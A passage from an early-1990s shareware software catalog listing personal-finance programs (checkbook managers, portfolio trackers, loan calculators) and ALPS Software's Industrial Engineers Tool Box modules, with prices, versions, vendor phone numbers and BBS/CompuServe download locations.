tech support, 90-day money back + gaurantee. + Look for: WCK30A.ZIP on BBSs (call 206-935-5198 to download it at + no charge); WCK30A.ZIP in WINAPA forum LIB 15 on CompuServe. + Download size: 350k + Description: + A new generation checkbook management program for the home and + small business market. It has stunning visuals and 3-D + effects. Transactions such as check writing, saving account + transactions, deposits, interest accrued, cash machine advances + and much more are all included. Designed to manage any number + of accounts. Data can be exported to Excel, 123, or dBase. It + can print checks and reports. Former Quicken users can easily + update to WinCheck with our new conversion program. + + 9.2.2 Checkbook managers + + Product: Checkbook Management Program + Needs: IBM PC, DOS 2.1 or better. + Author: M. P. Data, 615-349-7744 + Registration: $35.00 + Registration benefits: Printed manual, current version, reduced + price on future upgrades, notification of upgrades and other + M.P.Data software. + Version: 5.03 (05-07-90) + User benefits: Printed manual, current version, reduced price on + future upgrades, notification of upgrades and other M.P.Data + software. + Look for: CHECKS*.ZIP (multiple files) on BBSs. + Download size: 400k + Description: + Eases checkbook maintenance. Transactions include checks, + deposits, auto-teller deposits and withdrawals, interest, and + bank and service charges. Current balance displayed often. + + Prints checks on any printer and any check form. Numerous + reports, including several ways to list transactions, + expenditure and income summaries in a table form, and account + summary report. + + Product: CheckMate Plus [***] + Checkbook-based Accounting. See full description on page 191. + + Product: DJ-CHECK + Print checks on DeskJet printers. See full description on + page 51. + + Chapter 9, "Finances" 253 + + + + Product: EASY BANKING + Business or Personal Banking Information Mgr. See full + description on page 245. + + Product: EliteCheck + Needs: IBM PC, DOS 3.0 or better. 512k RAM. + Author: Taewoong Jeon + Registration: $25.00 + Registration benefits: Printed manual, a free upgrade, upgrade + notices, 90-day technical support, 30-day return policy no + questions asked. + Version: 1.1a (10-01-91) + User benefits: Printed manual, a free upgrade, upgrade notices, + 90-day technical support, 30-day return policy no questions + asked. + Look for: ECS11A.EXE on BBSs; ECS11A.EXE in IBMAPP forum LIB 4 on + CompuServe. + Download size: 210k + Description: + A checkbook/budget manager for home/small business use. + Spreadsheet-style Register. Extremely easy to use, yet + powerful. + v/ edits directly in the check register + v/ add, delete, change, clear, void & unvoid transactions + v/ reconciliation + v/ print income/budget statement + v/ pull-down menu + v/ context-sensitive help + v/ up to 30 accounts, 32,767 transactions per account + v/ 4 separate category sets, up to 100 categories for each + v/ up to 100 recurrent payees + + Product: FASTFILE + Laptop database for business, school, home. See full + description on page 155. + + Product: QPACS + Needs: IBM PC, DOS 2.0 or better. + Author: Richard A. Williams, 815-455-6333 + Registration: $22.00 + Registration benefits: Master disks, one free upgrade. + Version: 3.2 (01-01-92) + User benefits: Master disks, one free upgrade. + Look for: availability unknown on BBSs; QPACS.ZIP in IBMAPP forum + LIB 3 on CompuServe; QPACS.ZIP in IBMPC RTC LIB 6 on GEnie. + Download size: 85k + Description: + Designed to provide financial management functions for + individuals and families. The following functions are + provided: checkbook entries for up to nine bank accounts; + check printing with a recurring check file; check registers; + budget entry and actual-to-budget reports; ability to record + and track assets, liabilities, and investments; net worth + + Chapter 9, "Finances" 254 + + + + calculation and printout; index card file and a household + inventory file. + + Product: WinCheck + Personal Finance Manager for WIndows 3.0. See full description + on page 251. + + + 9.3 File format translators + + See also: Utilities, File utilities, File conversion (page 38). + + Product: $tokTraX + Stock portfolio and charting system. See full description on + page 254. + + + 9.4 Portfolio management + + Product: Capital Gainz + Needs: IBM PC, DOS 3.0 or better. Hard disk. + Author: DBLinx, 919-469-5196 + Registration: $39.00 + Registration benefits: Printed manual, free upgrade, support, + bonus utilities. + Version: 3.0 (02-24-92) + User benefits: Printed manual, free upgrade, support, bonus + utilities. + Look for: availability unknown on BBSs; CPGNZ*.ZIP in INVFOR + forum LIB 9 (multiple files) on CompuServe. + Download size: 550k + Description: + A portfolio manager for both small investors and professional + investment managers. Ideal for a 'dollar-cost averaging' + strategy. Record purchases, sales, dividends, capital gains; + calculate gain/loss and total return; view or print information + for one or more securities and over a range of dates; reinvest + dividends; record stock splits; execute sales of multiple + purchases using FIFO, LIFO, max gain, max loss, specific ID, + average cost; determine allocation; generate tax forms. 300+ + page manual. + + Product: Money Smith + Home Accounting Package for Windows 3.0. See full description + on page 249. + + Product: ORGANIZE! Your Art + Cataloging system for all types of art. See full description + on page 353. + + Chapter 9, "Finances" 255 + + + + Product: $tokTraX + Needs: IBM PC, DOS 2.11 or better. Hard disk; CGA or AT&T + graphics. + Author: Stoktrax Systems + Registration: $49.00 + Registration benefits: Registration code, six months support, + guarantee. + Version: 4.05 (02-24-92) + User benefits: Registration code, six months support, guarantee. + Look for: STX405.ZIP on BBSs; STX405.ZIP in INV:STOCKS forum LIB + 1 on CompuServe; STX405.ZIP in INVESTORS RTC LIB 4 on GEnie. + Download size: 596k + Description: + Complete stock investment program that provides all the + features that most investors will ever need: manage up to 200 + portfolios, with summary and detailed reports; excellent + graphics can chart over 8 years of daily data; database of + 8000+ names & symbols; statistical data analysis; two broker + commission estimators; conversion utility translates data + captured from CompuServe, GEnie, Prodigy, and others; extensive + mouse support; much more! Users in over 40 U.S. and 6 foreign + states. + + + 9.5 Finance utilities + + Product: AFFORD IT??? + Needs: IBM PC, DOS 3.0 or better. 256k RAM. + Author: Garrett Krueger Software Development, 612-776-9942 + Registration: $22.00 + Registration benefits: Master disks, phone/mail support. + Version: 3.02 (08-22-91) + User benefits: Master disks, phone/mail support. + Look for: AFFORD.ZIP on BBSs (call 317-856-2087 to download it at + no charge). + Download size: 256k + Description: + A super calculation system which you MUST have if you SAVE + money. Determines future values on annuities and fixed + principles. It will track your loans and calculate loan + payment amounts using standard amortization and/or fixed + principle reductions. The Rule of 78's is used to find the + payoff amount on a loan. If you are living from your savings + account, it will tell how long money will last and how much can + be withdrawn. Includes on-screen "pocket" calculator usable + with DOS too. + + Chapter 9, "Finances" 256 + + + + Product: YieldBook + Needs: IBM PC, DOS 3.0 or better. + Author: Compound Solutions + Registration: $25.00 + Registration benefits: Three months mail support; bonus + utilities. + Version: 1.2 (02-17-92) + User benefits: Three months mail support; bonus utilities. + Look for: availability unknown on BBSs; YB.ZIP in INVFORUM forum + LIB 2 on CompuServe. + Download size: 30k + Description: + Calculates prices and yields on corporate, muncipal and US + Government bonds to either the call date or maturity in + accordance with security industry standards. + + + 9.6 Other + + Product: AMORTIZATION TABLE + Needs: IBM PC, DOS 2.1 or better. + Author: H&P Software, 719-561-0810 + Registration: $29.95 + Registration benefits: Lates version with printed manual. + Version: 3.52 (04-26-91) + User benefits: Lates version with printed manual. + Look for: AMRTABLE (multiple files) on BBSs. + Download size: 130k + Description: + A 360 day year loan amortization program that calculates and + prints amortization schedules for loans up to $999,999,999.00. + Does schedules for 1, 2, 4, 12, 24, 26 or 52 payments per year. + Prints either full or end-year-total-only schedules. Creates + regular, interest-only, and discounted loan schedules with + simple APR (equal payment date interval) calculation. + Additional 'Principal-Only' payments may be added. Supports + dot matrix or laser printers. + + Product: AS-EASY-AS [***] + Extraordinary Spreadsheet. See full description on page 148. + + Chapter 9, "Finances" 257 + + + + Product: Charge Account Management Prog. + Needs: IBM PC, DOS 2.1 or better. + Author: M. P. Data, 615-349-7744 + Registration: $25.00 + Registration benefits: Printed manual, current version, reduced + price on future upgrades, notification of upgrades and other + M.P.Data software. + Version: 1.11 (11-08-89) + User benefits: Printed manual, current version, reduced price on + future upgrades, notification of upgrades and other M.P.Data + software. + Look for: CHARGE*.ZIP (multiple files) on BBSs. + Download size: 300k + Description: + Helps you keep a handle on your credit cards. Up to 50 charge + accounts may be managed by this program. Transactions include + charges, payments, interest, and credits. + + Numerous reports can be limited to a single account or all + accounts and include several ways to list transactions, an + expenditure summary table (by month and budget category), and + an account summary listing giving the bottom line for each + account. + + Product: PAYMENT BOOK WRITER + Needs: IBM PC, DOS 2.1 or better. + Author: H&P Software, 719-561-0810 + Registration: $19.95 + Registration benefits: Latest version with printed manual. + Version: 2.0 (04-13-91) + User benefits: Latest version with printed manual. + Look for: PMTBOOK (multiple files) on BBSs. + Download size: 86k + Description: + Prints payment coupon books for either the loan company, or + personal lender. The books can be printed on either 8-1/2 x 11 + inch paper then cut on a trimming board, or on 8-1/2 x 3-1/2 + perfed paper. Prints your letterhead, increments date, and + prints final payment amount along with a small disclaimer/ + disclosure statement on each page. When finished, simply tear + off the right tractor margins, leave the left margins on, then + staple the left margins along with a cover of your choice. + + Chapter 10, "Engineering" 258 + + + + + + Chapter 10 + Engineering + + See also: Graphics, CAD/CAM applications (page 337). + + + 10.1 Industrial engineering + + Product: ALPS + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX. + Author: ALPS Software, 719-269-1117 + Registration: $0.00 + Registration benefits: Master disks, phone/CompuServe/mail + support. + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPS1.EXE (multiple files) on BBSs; ALPS1.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 30k + Description: + The entry menu into the Industrial Engineers Tool Box. It acts + as program or process controller for the 20 programs within the + tool box & alerts the operator when a module called for is not + on the hard disk. This program is the only one in the I E Tool + Box that has a registration reminder screen. To properly + evaluate the I E Tool Box, all 20 programs are required. + + Product: ALPS(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, Draft + Choice, the Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $0.00 + Registration benefits: Master disks, phone/CompuServe/mail + support. + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPPC1.EXE (multiple files) on BBSs; ALPPC1.EXE in + IBMAPP forum LIB 13 (multiple files) on CompuServe. + Download size: 30k + Description: + The entry menu into the Personal Consultant. It acts as + program or process controller for the 18 programs within the + system & alerts the operator when a module called for is not on + the hard disk. This program is the only one in the Personal + Consultant that has a registration reminder screen. To + properly evaluate the Personal Consultant, all 18 programs are + required. + + Chapter 10, "Engineering" 259 + + + + Product: Architectural Engineering + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX, PC-KEY DRAW. + Author: ALPS Software, 719-269-1117 + Registration: $15.00 + Registration benefits: Printed manual, master disks, phone/ + CompuServe/mail support. + Version: 3.0 (11-15-91) + User benefits: Printed manual, master disks, phone/CompuServe/ + mail support. + Look for: ALPS1.EXE (multiple files) on BBSs; ALPS1.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 34k + Description: + AE is an adjunct to the Facilities Management Section of the + Industrial Engineers Tool Box. It is the initializer for PC- + KEY DRAW, where an ALPS custom library of architectural symbols + can be used for facility drawings from layout planning to + repair & alteration development. Here also, work station unit + modules can be made & stored to simplify drawing detailed + layouts, or operation requirements. Proper evaluation of the I + E Tool Box requires all 20 programs. + + Product: Complement & Schedules + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + Tool Box. + Author: ALPS Software, 719-269-1117 + Registration: $40.00 + Registration benefits: Master disks, phone/CompuServe/mail + support. + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPS2.EXE (multiple files) on BBSs; ALPS2.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 87k + Description: + Allows development of a data base of complement information + most often needed by managers to manage the operation. This + data base can report on seniorities for bidding purposes. It + can also be used for developing weekly work schedules, showing + variations to the normal schedule for vacation, sickness, etc., + plus other than fulltime regulars. Proper evaluation of the IE + Tool Box requires all 20 programs. + + Chapter 10, "Engineering" 260 + + + + Product: Complement & Schedules(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, the + Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $40.00 + Registration benefits: Master disks, phone/CompuServe/mail + support. + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPPC1.EXE (multiple files) on BBSs; ALPPC1.EXE in + IBMAPP forum LIB 13 (multiple files) on CompuServe. + Download size: 87k + Description: + Allows development of a data base of complement information + most often needed by managers to manage the operation. This + data base can report on seniorities for bidding purposes. It + can also be used for developing weekly work schedules, showing + variations to the normal schedule for vacation, sickness, etc., + plus other than full time regulars. Proper evaluation of the + Personal Consultant requires all 18 programs. + + Product: Custodial Requirements + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX. + Author: ALPS Software, 719-269-1117 + Registration: $25.00 + Registration benefits: Printed manual, master disks, phone/ + CompuServe/mail support. + Version: 3.0 (11-15-91) + User benefits: Printed manual, master disks, phone/CompuServe/ + mail support. + Look for: ALPS1.EXE (multiple files) on BBSs; ALPS1.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 84k + Description: + A module within the Facilities Management section of the + Industrial Engineers Tool Box. It develops workhour + requirements by operation. It can be used to develop employee + work assignments when used with a detailed CAD layout drawing, + showing blocked out assignments coded with cleaning needs & + freqs.. Also builds fringe benefits into workhours to allow + development of overall staffing requirements. Proper + evaluation of the I E Tool Box requires all 20 programs. + + Chapter 10, "Engineering" 261 + + + + Product: Custodial Requirements(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, Draft + Choice, the Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $25.00 + Registration benefits: Printed manual, master disks, phone/ + CompuServe/mail support. + Version: 3.0 (11-15-91) + User benefits: Printed manual, master disks, phone/CompuServe/ + mail support. + Look for: ALPPC1.EXE (multiple files) on BBSs; ALPPC1.EXE in + IBMAPP forum LIB 13 (multiple files) on CompuServe. + Download size: 84k + Description: + A module within the Facilities Management Section of the + Personal Consultant. It develops workhour requirements by + operation. It can be used to develop employee work assignments + when used with a detailed CAD layout drawing, showing blocked + out assignments coded with cleaning needs & frequencies. Also + builds fringe benefits into workhours to allow development of + overall staffing requirements. Proper evaluation of the + Personal Consultant requires all 18 programs. + + Product: Decision Analysis + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX. + Author: ALPS Software, 719-269-1117 + Registration: $25.00 + Registration benefits: Master disks, phone/CompuServe/mail + support. + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPS1.EXE (multiple files) on BBSs; ALPS1.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 80k + Description: + Allows alternative analysis in all areas of the Industrial + Engineers Tool Box. It develops discounted differential cash + flows, showing benefit/cost ratios, & ROI or IRR can be + developed. Building salvage values (w/decay & obsolescence) + can be developed. Amortization tables (incl. accelerated pay- + off strategies), & straight line or sum of the years + depreciation tables can be developed. Proper evaluation of the + I E Tool Box requires all 20 programs. + + Chapter 10, "Engineering" 262 + + + + Product: Decision Analysis(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, the + Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $25.00 + Registration benefits: Master disks, phone/CompuServe/mail + support. + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPPC2.EXE (multiple files) on BBSs; ALPPC2.EXE in + IBMAPP] forum LIB 13 (multiple files) on CompuServe. + Download size: 80k + Description: + Allows alternative analysis in all areas of the Personal + Consultant. It develops discounted differential cash flows, + showing benefit/cost ratios, & ROI or IRR can be developed. + Building salvage values (w/decay & obsolescence) can be + developed. Amortization tables (incl. accelerated pay-off + strategies), & straight line or sum of the years depreciation + tables can be developed. Proper evaluation of the Personal + Consultant requires all 18 programs. + + Product: Easy Project + Project Management Software. See full description on page 219. + + Product: EE + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX, PC-KEY DRAW. + Author: ALPS Software, 719-269-1117 + Registration: $15.00 + Registration benefits: Master disks, phone/CompuServe/mail + support. + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPS3.EXE (multiple files) on BBSs; ALPS3.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 35k + Description: + EE is included in the Industrial Engineers Tool Box as a + library initializer & instruction for a customized electronics + library of symbols created by ALPS Software in PC-KEY DRAW. + Schematic diagrams can be generated. Proper evaluation of the + Industrial Engineers Tool Box requires all 20 programs. + + Chapter 10, "Engineering" 263 + + + + Product: Flow Process + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX, PC-KEY DRAW. + Author: ALPS Software, 719-269-1117 + Registration: $15.00 + Registration benefits: Master disks, phone/CompuServe/mail + support, upgrade discounts. + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support, + upgrade discounts. + Look for: ALPS2.EXE (multiple files) on BBSs; ALPS2.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 46k + Description: + A module within the Work Measurement Section of the Industrial + Engineers Tool Box. It develops tables to track material + through operations used for one component, then initializes PC- + KEY DRAW to use an ALPS Software customized process chart + symbol library to draw a flow process chart. Proper evaluation + of the I E Tool Box requires all 20 programs. + + Product: Flow Process(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, Draft + Choice, the Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $15.00 + Registration benefits: Master disks, phone/CompuServe/mail + support. + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPPC2.EXE (multiple files) on BBSs; ALPPC2.EXE in + IBMAPP forum LIB 13 (multiple files) on CompuServe. + Download size: 46k + Description: + A module within the Work Measurement Section of the Personal + Consultant. It develops tables to track material through + operations used for one component, then initializes Draft + Choice to use an ALPS Software customized process chart symbol + library to draw a flow process chart. Proper evaluation of the + Personal Consultant requires all 18 programs. + + Chapter 10, "Engineering" 264 + + + + Product: Furniture & Equipment Survey + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX. + Author: ALPS Software, 719-269-1117 + Registration: $25.00 + Registration benefits: Printed manual, master disks, phone/ + CompuServe/mail support, upgrade discounts. + Version: 3.0 (11-15-91) + User benefits: Printed manual, master disks, phone/CompuServe/ + mail support, upgrade discounts. + Look for: ALPS1.EXE (multiple files) on BBSs; ALPS1.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 63k + Description: + A module within the FMS section of the Industrial Engineers + Tool Box. It catalogs furniture & equipment by operation, and + allows assignment of work station units to each operation. + This data is useful also in developing operation requirements, + equipment needs and costs by operation &/ or floor. The Work + Station Unit by operation data is useful in developing + standardized detail drawings in a CAD system. Proper evaluation + of the I E Tool Box requires all 20 programs. + + Product: Furniture, Equipment Survey(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, Draft + Choice, the Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $25.00 + Registration benefits: Printed manual, master disks, phone/ + CompuServe/mail support, upgrade discounts. + Version: 3.0 (11-15-91) + User benefits: Printed manual, master disks, phone/CompuServe/ + mail support, upgrade discounts. + Look for: ALPPC2.EXE (multiple files) on BBSs; ALPPC2.EXE in + IBMAPP forum LIB 13 (multiple files) on CompuServe. + Download size: 63k + Description: + A module within the FMS section of the Personal Consultant. It + catalogs furniture & equipment by operation & allows assignment + of work station units to each operation. This data is useful + also in developing operation requirements, equipment needs and + costs by operation &/or floor. The Work Station Unit by + operation data is useful in developing standardized detail + drawings in a CAD system. Proper evaluation of the Personal + Consultant requires all 18 programs. + + Chapter 10, "Engineering" 265 + + + + Product: Graphical Representation + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX. + Author: ALPS Software, 719-269-1117 + Registration: $15.00 + Registration benefits: Printed manual, master disks, phone/ + CompuServe/mail support. + Version: 3.0 (11-15-91) + User benefits: Printed manual, master disks, phone/CompuServe/ + mail support. + Look for: ALPS1.EXE (multiple files) on BBSs; ALPS1.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 47k + Description: + A module within the Facilities Management Section of the + Industrial Engineers Tool Box. It allows visualization of data + developed in Layout Planning, Furniture & Equipment Survey & + Overhead Cost programs. Scaled output is in calibration + charts, space utilization, square foot cost/operation, + equipment cost/operation & more. Proper evaluation of the I E + Tool Box requires all 20 programs. + + Product: Graphical Representation(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, the + Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $15.00 + Registration benefits: Printed manual, master disks, phone/ + CompuServe/mail support, upgrade discounts. + Version: 3.0 (11-15-91) + User benefits: Printed manual, master disks, phone/CompuServe/ + mail support, upgrade discounts. + Look for: ALPPC2.EXE (multiple files) on BBSs; ALPPC2.EXE in + IBMAPP forum LIB 13 (multiple files) on CompuServe. + Download size: 47k + Description: + A module within the Facilities Management Section of the + Personal Consultant. It allows visualization of data developed + in Layout Planning, Furniture & Equipment Survey & Overhead + Cost programs. Scaled output is in calibration charts, space + utilization, square foot cost/opera- tion, equipment cost/ + operation & more. Proper evaluation of the Personal Consultant + requires all 18 programs. + + Chapter 10, "Engineering" 266 + + + + Product: Layout Planning + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX. + Author: ALPS Software, 719-269-1117 + Registration: $25.00 + Registration benefits: Printed manual, master disks, phone/ + CompuServe/mail support. + Version: 3.0 (11-15-91) + User benefits: Printed manual, master disks, phone/CompuServe/ + mail support. + Look for: ALPS1.EXE (multiple files) on BBSs; ALPS1.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 65k + Description: + A module of the FMS of the Industrial Engineers Tool Box. It + aids in efficient & optimum use of space, reducing operating + costs through reduced walking time, improved ability to + supervise, improved communications between operations & + improved ability to share manpower & equipment. It can identify + needs for space &/or furniture & equipment, when used with + Furniture & Equipment Survey. Proper evaluation of the I E + Tool Box requires all 20 programs. + + Product: Layout Planning(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, Draft + Choice, the Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $25.00 + Registration benefits: . + Version: 3.0 (11-15-91) + User benefits: . + Look for: ALPPC2.EXE (multiple files) on BBSs; ALPPC2.EXE in + IBMAPP forum LIB 13 (multiple files) on CompuServe. + Download size: 65k + Description: + A module of the FMS of the Personal Consultant. It aids in + efficient & optimum use of space, reducing operating costs + through reduced walking time, improved ability to supervise, + improved communications between operations & improved ability + to share manpower & equipment. It can identify needs for space + &/or furniture & equipment, when used with Furniture & + Equipment Survey. Proper evaluation of the Personal Consultant + requires all 18 programs. + + Chapter 10, "Engineering" 267 + + + + Product: Man/machine Process + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX, PC-KEY DRAW. + Author: ALPS Software, 719-269-1117 + Registration: $15.00 + Registration benefits: Master disks, phone/CompuServe/mail + support. + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPS2.EXE (multiple files) on BBSs; ALPS2.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 48k + Description: + A module in the Work Measurement Section of the Industrial + Engineers Tool Box. It develops tables to track man & machine + utilization & downtimes, then initializes PC-KEY DRAW to use an + ALPS Software custom process chart library to draw a man/ + machine process chart. Proper evaluation of the I E Tool Box + requires all 20 programs. + + Product: Man/Machine Process(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, Draft + Choice, the Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $15.00 + Registration benefits: Master disks, phone/CompuServe/mail + support. + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPPC2.EXE (multiple files) on BBSs; ALPPC2.EXE in + IBMAPP forum LIB 13 (multiple files) on CompuServe. + Download size: 48k + Description: + A module in the Work Measurement Section of the Personal + Consultant. It develops tables to track man & machine + utilization & down times, then initializes Draft Choice to use + an ALPS Software custom process chart library to draw a man/ + machine process chart. Proper evaluation of the Personal + Consultant requires all 18 programs. + + Chapter 10, "Engineering" 268 + + + + Product: Methods Time Measurement + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX. + Author: ALPS Software, 719-269-1117 + Registration: $25.00 + Registration benefits: Master disks, phone/CompuServe/mail + support. + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPS1.EXE (multiple files) on BBSs; ALPS1.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 68k + Description: + MTM is a module in the Work Measurement Section of the Indust- + rial Engineers Tool Box. It should only be used by a cert- + ified analyst, and as such, does not include the TMU chart + supplied by the MTM Association. It does all the grunt work + after the analyst fills in the frequencies, TMU's, & motion + descriptions. It takes the data developed in element or + methods analysis into summary form. Proper evaluation of the I + E Tool Box requires all 20 programs. + + Product: Methods Time Merasurement(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, Draft + Choice, the Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $25.00 + Registration benefits: Master disks, phone/CompuServe/mail + support. + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPPC1.EXE (multiple files) on BBSs; ALPPC1.EXE in + IBMAPP forum LIB 13 (multiple files) on CompuServe. + Download size: 68k + Description: + A module in the Work Measurement Section of the Personal + Consultant. It should only be used by a certified analyst, and + as such, does not include the TMU chart supplied by the MTM + Association. It does all the grunt work after the analyst + fills in the frequencies, TMU's & motion descriptions. It + takes the data developed in element or methods analysis into + summary form. Proper evaluation of the Personal Consultant + requires all 18 programs. + + Chapter 10, "Engineering" 269 + + + + Product: Operation Process + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX, PC-KEY DRAW. + Author: ALPS Software, 719-269-1117 + Registration: $15.00 + Registration benefits: Master disks, phone/CompuServe/mail + support. + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPS2.EXE (multiple files) on BBSs; ALPS2.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 46k + Description: + A module of the Work Measurement Section of the Industrial + Engineers Tool Box. It collects data for an operation process + chart, showing the overall actions of producing a product + through operations with materials used. Then it initializes PC- + KEY DRAW to use an ALPS Software custom process chart library + to draw an operation process chart. Proper evaluation of the I + E Tool Box requires all 20 programs. + + Product: Operation Process(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, Draft + Choice, the Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $15.00 + Registration benefits: Master disks, phone/CompuServe/mail + support. + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPPC2.EXE (multiple files) on BBSs; ALPPC2.EXE in + IBMAPP forum LIB 13 (multiple files) on CompuServe. + Download size: 46k + Description: + A module of the Work Measurement Section of the Personal + Consultant. It collects data for an operation process chart, + showing the overall actions of producing a product through + operations with materials used. Then it initializes Draft + Choice to use an ALPS Software custom process chart symbols + library to draw an operation process chart. Proper evaluation + of the Personal Consultant requires all 18 programs. + + Chapter 10, "Engineering" 270 + + + + Product: Operator Process + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX, PC-KEY DRAW. + Author: ALPS Software, 719-269-1117 + Registration: $15.00 + Registration benefits: Master disks, phone/CompuServe/mail + support. + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPS2.EXE (multiple files) on BBSs; ALPS2.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 48k + Description: + A module in the Work Measurement Section of the Industrial + Engineers Tool Box. It collects data to show right & left hand + motions used in performing a task (does not use Therbligs), + then it initializes PC-KEY DRAW to use an ALPS Software custom + process symbol library to draw an operator chart (which can + also be used as task description on the job). Proper evaluation + of the I E Tool Box requires all 20 programs. + + Product: Operator Process(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, Draft + Choice, the Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $15.00 + Registration benefits: Master disks, phone/CompuServe/mail + support. + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPPC2.EXE (multiple files) on BBSs; ALPPC2.EXE in + IBMAPP forum LIB 13 (multiple files) on CompuServe. + Download size: 48k + Description: + A module in the Work Measurement Section of the Personal + Consultant. It collects data to show right & left hand motions + used in performing a task (does not use Therbligs), then it + initializes Draft Choice to use an ALPS Software custom process + symbol library to draw an operator chart (which can also be + used as a task description on the job). Proper evaluation of + the Personal Consultant requires all 18 programs. + + Chapter 10, "Engineering" 271 + + + + Product: Overhead Cost + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX. + Author: ALPS Software, 719-269-1117 + Registration: $25.00 + Registration benefits: Printed manual, master disks, phone/ + CompuServe/mail support. + Version: 3.0 (11-15-91) + User benefits: Printed manual, master disks, phone/CompuServe/ + mail support. + Look for: ALPS2.EXE (multiple files) on BBSs; ALPS2.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 57k + Description: + A module within the Facilities Management Section of the + Industrial Engineers Tool Box. It pulls data developed in FES + & CLN into overhead cost data by operation. It also allows data + for utilities, facility cost, taxes, insurance, etc. to be + prorated by operation. It doesn't attempt to develop data + accurate to the penny, but rather develops trends to point out + possible areas of concern in overhead cost management. Proper + of the I E Tool Box requires all 20 programs. + + Product: Overhead Cost(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, the + Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $25.00 + Registration benefits: Printed manual, master disks, phone/ + CompuServe/amil support. + Version: 3.0 (11-15-91) + User benefits: Printed manual, master disks, phone/CompuServe/ + amil support. + Look for: ALPPC2.EXE (multiple files) on BBSs; ALPPC2.EXE in + IBMAPP 